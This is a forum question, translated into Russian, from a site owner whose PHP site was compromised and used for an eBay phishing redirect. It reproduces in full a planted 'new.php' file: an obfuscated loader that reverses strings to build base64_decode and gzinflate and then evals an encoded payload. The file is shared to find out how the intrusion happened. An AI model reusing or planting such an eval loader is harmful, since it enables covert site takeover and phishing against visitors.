Недавно был взломан мой сайт. Хотя фактический веб-сайт остается неизменным, они каким-то образом могли использовать домен для создания ссылки, перенаправленной на мошенничество с фишингом ebay.Какова уязвимость в моем PHP-коде?
Я взял сайт по понятным причинам, поэтому я не могу ссылаться на код. Мне интересно, как я могу узнать, какую уязвимость они использовали, чтобы я мог избежать этой проблемы в будущем. На странице использовался PHP, а также некоторый javascript (для проверки формы).
Есть ли бесплатный сервис, который сканирует мой код на наличие уязвимостей? Каковы мои другие варианты?
Спасибо, Джефф
EDIT: Я принимал файлы на [ссылка удалена]
несколько вещей, чтобы отметить: Есть несколько файлов в «funcs» папка, большинство из которых Арен Я использовал их, но я оставил их там на всякий случай. Проблема «new.php» (содержимое ниже) в папке «данные» явно является проблемой. Большой вопрос: как кому-то удалось загрузить «new.php» на сервер? Также есть RTF полученного мной электронного письма, в котором есть информация о мошенничестве.
(Внимание: этот код, вероятно, «опасно» на ваш компьютер)
<?php
$prv=strrev('edoced_46esab');
$vrp=strrev('etalfnizg');
eval($vrp($prv("rVPRbpswFNW0P9jbNE1ChojQSDD7cm0syvoB5A/GxhiBJVoKxJC0pFr667v0pe1L2k17snyvz/G559jOLxCVxjGCfEBYc1noQfE8VL0SpUYTwQah43LQueKbh3IeQYlguBx1p/gQqkqJFUKiPsWO0Vgh9LoN1R4EoUsuq7xU3Cgxgug0DhHQiVVOjVavFK9ClbDjKH2ZLgOrbpoA0RbNj/dv3r77KF3ED237vVlkrH9Wu7srzM1uv7t3h942N5mTsYM7O52s0y5jsz3thntz6gvCPiWcEVubLpO0tme+VxdHGdq3xe90WU+0wg+hQREGEi9c9G18gprOBPPZBWTMfixP1YwFdlMcNw9UVInT5XjLYqcHQcOSTxvFGyV+5q3GPcKgOzKHHFUi+Te/YmerBK0Nua/XectlnU+JRDBq7OjWKRJOEE0tSqaKIOkHs62a+StEebFDgR4UL7jc5l0Ea9JBXNiSDD3F5bpx3Zq5syaIpudx0FiAuI7gwGVPCpW4TugtnGlf/v0EZ/kWC+8F0ZafWOXazFuzeo0JX87d9tWzvlnOf/s4Xlwdiu2cXX1m/gtT+OzyinnxHw==")));
?>
Я думаю, что этот вопрос был бы лучше на http://serverfault.com/. – Maxpm
.. или Security StackExchange Beta на http://security.stackexchange.com – soulseekah
@Maxpm Возможно, но я не администратор сервера. И это уязвимость в коде, а не сама сеть. К сожалению, я не могу ссылаться на код, но если кто-то захочет помочь, я могу, возможно, зайти на сайт и разместить его где-нибудь? – Jeff